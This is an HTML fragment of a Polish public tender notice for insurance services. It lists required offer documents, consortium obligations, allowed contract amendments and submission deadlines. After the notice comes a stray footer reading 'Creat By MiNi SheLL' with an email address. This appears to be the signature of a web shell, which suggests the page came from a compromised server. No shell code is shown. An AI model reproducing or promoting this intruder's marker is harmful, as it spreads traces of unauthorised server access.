6 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 12.2. Oferta musi zawierać co najmniej:<br/>12.2.1. Wypełniony Formularz oferty, stanowiący Załącznik nr 2 do SWZ.<br/>12.2.2. Wypełniony Formularz cenowy, stanowiący Załącznik nr 3a (Zadanie I) i/lub Załącznik nr 3b (Zadanie II) do SWZ.<br/>12.2.3. Pełnomocnictwo lub ciąg Pełnomocnictw (zgodnie z wymogami określonymi w Pkt. 15 SWZ). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 12.2.4.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego:<br/>a) Ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>b) Każdy z Wykonawców, wspólnie ubiegających się o udzielenie zamówienia publicznego zobligowany jest do złożenia<br/>Oświadczenia, stanowiącego Załącznik nr 6 do SWZ, potwierdzającego, że spełnia warunki udziału w postępowaniu i nie<br/>podlega wykluczeniu.<br/>c) Członkowie konsorcjum zgodnie z art. 445 ustawy Pzp ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>12.2.4.3. Dokumenty wymagane od podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp<br/>zostały określone w pkt. 13.<br/>12.2.4.4. Dokumenty wymagane od podwykonawcy, niebędącego podmiotem udostępniającym zasoby zostały określone w<br/>pkt. 14. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 27.2. Zamawiający przewiduje możliwość zmiany postanowień Umowy, zawartej z Wykonawcą, w ramach niniejszego<br/>postępowania, w zakresie:<br/>27.2.1. Przedmiotu zamówienia w zakresie określonym w punkcie 27.3.<br/>27.2.2. Terminu realizacji zamówienia<br/>27.2.3. Wynagrodzenia Wykonawcy, przy czym nie może ono ulec zwiększeniu o więcej niż 20%.<br/>27.3. Zmiana ta może dotyczyć:<br/>27.3.1. wysokości ostatecznej składki należnej Wykonawcy za cały okres udzielanej ochrony ubezpieczeniowej, z<br/>poszanowaniem postanowień zapisów umowy o wykonanie zamówienia. Zmiana ta jest dopuszczalna poprzez dodatkowe<br/>naliczenia składek w przypadku nabycia nowych pojazdów/mienia lub zwrotu składek w przypadku zbycia środków<br/>transportu/mienia, poprzez wystawienie przez Zamawiającego nowych polis lub Aneksów do polis, na wniosek Brokera<br/>27.3.2. zmiany obowiązujących przepisów prawa powodującej konieczność dostosowania do nich warunków umowy.<br/>Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez<br/>Wykonawcę.<br/>27.3.3. zawężenia zakresu prowadzonej działalności albo rezygnacji Ubezpieczającego z ochrony ubezpieczeniowej dla<br/>określonych ryzyk lub określonych składników majątku, wymagających ograniczenia zakresu ochrony ubezpieczeniowej i<br/>aktualizacji składki. Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do<br/>polisy przez Wykonawcę<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>27.3.4. zwiększenia zakresu prowadzonej działalności albo potrzeby objęcia ochroną ubezpieczeniową określonych ryzyk<br/>lub określonych składników majątku własnego lub powierzonego powodujące konieczność rozszerzenia ochrony<br/>ubezpieczeniowej i aktualizacji składki. Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz<br/>wystawienie Aneksu do polisy przez Wykonawcę<br/>27.3.5. uzupełnienia sumy ubezpieczenia/gwarancyjnej, limitu po wypłacie odszkodowania. Zmiana dokonywana na wniosek<br/>składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę.<br/>27.3.6. zmian dotyczących Ubezpieczonych objętych umową, polegających na powstawaniu nowych jednostek,<br/>przekształceniach, połączeniach, likwidacji jednostek istniejących, zmianach własnościowych lub ich formy prawnej. Zmiana<br/>dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę.<br/>27.3.7. obowiązku ubezpieczenia wynikającego z zawartych umów najmu, dzierżawy, leasingu lub innych o podobnym<br/>charakterze, Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy<br/>przez Wykonawcę.<br/>27.3.8. Skrócenia okresu ochrony w związku z wyrównaniem okresów ubezpieczenia. Zmiana dokonywana na wniosek<br/>składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę<br/>27.3.9. przedłużenia terminu wykonania zamówienia, z zastrzeżeniem, że przedłużenie takie nie będzie dłuższe niż 3<br/>miesiące, a jego konieczność wynika z przyczyn technicznych lub braku możliwości przeprowadzenia nowego<br/>postępowania, zgodnie z przepisami ustawy Pzp, zapewniającego ciągłość ochrony ubezpieczeniowej. Zmiana dokonywana<br/>na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę<br/>27.4. Wszelkie zmiany i uzupełnienia treści umowy wymagają pisemnej zgody pod rygorem nieważności i będą<br/>dopuszczalne w granicach i unormowaniach Prawa zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-05 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com